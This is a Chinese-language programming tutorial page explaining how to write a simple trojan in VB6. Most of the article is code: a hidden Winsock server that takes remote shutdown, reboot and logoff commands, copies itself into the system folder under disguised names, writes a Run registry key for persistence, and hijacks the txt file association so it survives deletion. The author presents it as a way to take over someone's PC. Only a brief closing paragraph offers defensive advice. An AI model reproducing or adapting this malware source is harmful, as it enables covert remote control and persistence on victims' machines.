今日是:
  小新技术网 -=> 程序开发 -=> VB编程 -=> 正文

VB中简单木马程序的编写

作者:[本站编辑] 来源:[本站] 浏览:[] 评论:[]  【字体:
 相信大家或多或少都听说过木马这个东西,可能它的危力也有过不少人领教过:在后台记录你的键盘输入,截取你的密码;从你的机子中神密地偷走你的重要资料;甚至格掉你的硬盘……那这些厉害的家伙它们是如果工作的呢?下面我就给大家一起来聊聊它们的工作原理。 
其它这些家伙已经并不是十分高明的技术了,它们不外乎也就是基于TCP/IP协议的客户端/服务端程序。工作原理也和普通的客户端/服务端软件一样,只不过它们隐藏得比较好,不容易发现而已。首先对你怀有野心的人利用现成的操作系统或是某些软件本身的漏洞想方设法的把服务端程序加到你的本机上运行,然后通过客户端向你本机中的服务端程序发出一些请求,最后对你本机进行操作,完成他们想要达到的目的。 
那这些请求是如何实现的呢?下面我来举一个例子。 
首先,新建一工程,名为Server,新建一个窗体,Name为frmServer,在窗体中加入一个winsock控件,Name设为sckServer,协议设为默认的TCP/IP协议。 
接下来我们回来frmServer窗体模块中,添加如下代码: 
Private Sub FORM_Load() 
With Me 
.sckServer.LocalPort = 4000‘本地端口 
.sckServer.Listen ‘开始监听 
End With 
End Sub 
‘接受客户端的连接请求。 
Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) 
With Me 
If .sckServer.State <>sckClosed Then .sckServer.Close 
.sckServer.Accept (requestID) 
End With 
End Sub 
下面我们来建立客户端程序:新建一个工程,名为Client,把窗体名为frmClient,在上面加入一个winsock控件,名为sckClient,协议为TCP/IP协议。再加一个按钮cmdConnect在窗体模块中加入代码: 
Private Sub FORM_Load() 
With Me 
.sckClient.RemoteHost = "127.0.0.1"‘设置远程IP,本例设为本机。 
.sckClient.RemotePort = 4000 ‘远程端口,就为server中的设置一样. 
End With 
End Sub 
Private sub cmdConnect_Click() 
SckClient.Connect 
End sub 
至此,单击Connect按钮我们的两个工程已经可以进行通信了,但看不见,你可以在Client中的sckClient_Connect事件中加入代码 debug.print Connetion successful来查看。 
这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,我们打算实现一点小小的功能 关机,重启,注销。好,开始吧! 
在Server工程中新建一个模块,Name为modApi,这个模快为一些API函数,添加如下API函数: 
 
Public Const EWX_LOGOFF = 0 
Public Const EWX_REBOOT = 2 
Public Const EWX_SHUTDOWN = 1 
Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor"(lpRect As Any) As Long 
Public Type RECT 
Left As Long 
Top As Long 
Right As Long 
Bottom As Long 
End Type 
注:在两个socket中编程中,进行通信的重要事件是DataArrival事件,用于接收远程数据 
下面在Client工程的frmClient窗体中放入三个按钮,分别为cmdExit cmdLogoff cmdReboot 它们用于对远程的关机,注销,重启操作。分别添加如下代码
Private Sub cmdExit_Click() 
Me.sckClient.SendData "Exit" 
End Sub 

Private Sub cmdLogoff_Click() 
Me.sckClient.SendData "Logoff" 
End Sub 

Private Sub cmdReboot_Click() 
Me.sckClient.SendData "Reboot" 
End Sub 

全都是对服务端发出请求。下面转到Server工程中 在frmServer中添加sckServer的DataArrial事件,接收客户端的请求。 
Private Sub sckServer_DataArrival(ByVal bytesTotal As Long) 
Dim strData As String 
With Me 
接收客户请求的信息 
sckServer.GetData strData 
Select Case strData 
Case "Exit" 
关机 

Case "Reboot" 
重启 

Case "Logoff" 
注销 

End Select 
End With 
End Sub 

好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在frmServer中的FORM_Load事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧! 
回到Server工程中的modApi中加入如下API函数: 
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long 
Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long 
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long 
Public Const REG_BINARY = 3 
Public Const REG_SZ = 1 
Public Const HKEY_LOCAL_MACHINE = &H80000002 
Public Const HKEY_CLASSES_ROOT = &H80000000 
写到注册表启动组中的过程。 
Public Sub StartupGroup() 
Dim sKey As String 
Dim result As Long 
Dim hKeyID As Long 
Dim sKeyVal As String 
 

 
sKey = "Systrsy" /'启动组中的键,找一个与系统文件相近的。 
sKeyVal = "C://windows//system//systrsy.exe" /'木马文件的路径,可以用GetSystemDirectory来取得系统路径。 
result = RegOpenKey(HKEY_LOCAL_MACHINE, _ 
"Software//Microsoft//Windows//CurrentVersion//Run", hKeyID) 
If result = 0 Then 
result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, _ 
Len(sKey) + 1) 
End If 
End Sub 
好就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码: 
Public Sub WriteToTxt() 
Dim result As Long 
Dim hKeyID As Long 
Dim skey As String 
Dim skeyVal As String 
skey = "txtfile//shell//open//command" 
skeyVal = "C://windows//system//txtView.exe" 
result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID) 
If result = 0 Then 
result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, _ 
skeyVal, Len(skeyVal) + 1) 
End If 
End Sub 
肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C://windows//system//txtView.exe是哪里来的,我们的木马是C://windows//system//systrsy.exe呀。这可是我们木马的分身了。 
好,回到Server工程的frmServer窗体的FORM_Load中,加入如下代码: 
Dim sCurrentPath As String, sSystemDir As String 
sCurrentPath = App.Path & "//" & App.EXEName & ".exe" 
sSystemDir = “C://windows//system” 
On Error Resume Next 
‘复制文件成系统目录下的Systrsy.exe 
FileCopy sCurrentPath, sSystemDir & "//Systrsy.exe" 
On Error Resume Next 
复制文件成系统目录下的txtView.exe 
FileCopy sCurrentPath, sSystemDir & "//txtView.exe" 
 

 
调用 
Call startupGroup 
Call WriteToTxt 

/'判断程序是否下在运行 
If App.PrevInstance Then 
‘如果已经运行就退出。 
End 
End If 

好了,到现在为止,我们的木马已经像个木马了。快把它编译为EXE文件吧!只要一运行你的程序,不管在哪里,就会把自身复制到系统目录下(还带一个分身),下次开机自己就运行了,这样你就可以把他的电脑给黑掉了。即使对方发现把它给删了,它一旦打开TXT文件,你的木马又复活了,怎么删也删不掉,哈哈! 
当然这只是个例子,只有简单的功能,而且里面好多地方也还要作修改,比如隐藏你的进程,修改你木马在系统目录下为隐藏、系统、只读属性等等,就看大家怎么发挥自己的聪明才能了。 

防范: 
大家可能已经看出来了,也即使是再COOL的木马,你不运行它,就什么事也不会发生,所以,无邪在这里提醒大家,不要去执行陌生的程序。其它任何自启动的程序都会在注册表启动组,程序菜单启动组或是win.ini中的Load下留下足迹,所以也让大家常去那些地方看看。 
有误的地方欢迎大家指正。 
]]>
下一篇:选择VB.NET还是C#
上一篇:用VB跟我学做记事本(很简单哟)
IP查询、IP签名
打印 】【 收藏 】【 评论 】【 推荐
相关文章 栏目推荐文章 栏目热门文章
 推荐文章 学习,是一条漫长的道路 
 普通文章 用VB跟我学做记事本(很简单哟) 
 普通文章 VB中简单木马程序的编写 
 普通文章 利用VB6.0设计屏幕保护程序 
 普通文章 Jave学习:巧用jabc进行数据库的操.. 
 普通文章 VB能做什么  
 普通文章 用VB学做“黑客”程序 
 普通文章 用VB在窗口中显示动画图标 
 普通文章 浅谈用VB6.0编写“特洛伊木马”程.. 
最新文章 最新推荐文章 热门文章
 普通文章 简历封面 
 普通文章 简历封皮(二) 
 推荐文章 用好Windows共享 确保安全 
 推荐文章 多点出发:消除局域网遗留共享痕迹.. 
 普通文章 只需三步!闪盘立刻变成启动盘 
 普通文章 战无不胜 一目了然看穿局域网 
 普通文章 Win 2000/XP在局域网内批量升级 
 普通文章 黑客经常更改的系统配置文件及注册.. 
 推荐文章 用好Windows共享 确保安全 
 推荐文章 多点出发:消除局域网遗留共享痕迹.. 
 推荐文章 Ghost二十个鲜为人知的实用参数 
 推荐文章 ASP.NET程序中常用的三十三种代码.. 
 推荐文章 黑客利用Ms05002溢出找“肉鸡” 
 推荐文章 C# 3.0语言详解之基本的语言增强 .. 
 推荐文章 Ghost所有运行错误代码完全大揭秘.. 
 推荐文章 利用Java Swing 实现游戏开发 
 推荐文章 秘籍:QQ头像任意换 
 普通文章 提升QQ等级 QQ挂机升级外挂  
 普通文章 QQ100个经典个性签名!可爱经典贴图.. 
 推荐文章 BIOS设置图解教程(多图) 
 普通文章 惊现腾讯QQ刷等级漏洞 
 普通文章 求职简历封皮  
 普通文章 突破在线观看电影 
 普通文章 GIF动画图片制作教程 
点击查看更多评论
笔名:
评论:
[评论将在5分钟内被审核,请耐心等待]
【注】 发表评论必需遵守以下条例:
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
  • 本站大部分为网络转载,如有版权问题,请通知我们,我们立即更正!

设置首页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接
Copyright ©2003-2005 xker.com All rights reserved. 网站合作、广告联系QQ:12231446
小新技术网  冀ICP备05002857号